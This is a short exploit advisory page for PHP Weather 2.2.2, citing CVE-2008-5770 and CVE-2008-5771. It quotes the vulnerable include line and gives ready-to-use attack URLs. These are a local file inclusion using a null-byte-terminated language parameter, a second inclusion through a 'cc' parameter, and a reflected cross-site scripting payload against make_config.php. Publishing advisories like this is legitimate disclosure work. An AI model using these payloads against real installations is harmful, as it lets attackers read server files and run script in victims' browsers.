PHP Weather 2.2.2 (LFI/XSS) Multiple Remote Vulnerabilities

2009.01.02
Credit: ahmadbady
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-5770 | CVE-2008-5771
CWE: CWE-79
CWE-22

****(Lfi/xss)**** script: phpweather-2.2.2 *************************************************************************** download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0 *************************************************************************** vul: /test.php line 48: require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php"); *************************************************** xpl: www.site.com/path/test.php?metar=()&language=[Lfi]%00 ..................................................... www.site.com/path/index.php?cc=[Lfi] .................................................... xss: www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt> .................................................. Author: ahmadbady from:iran ***************************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top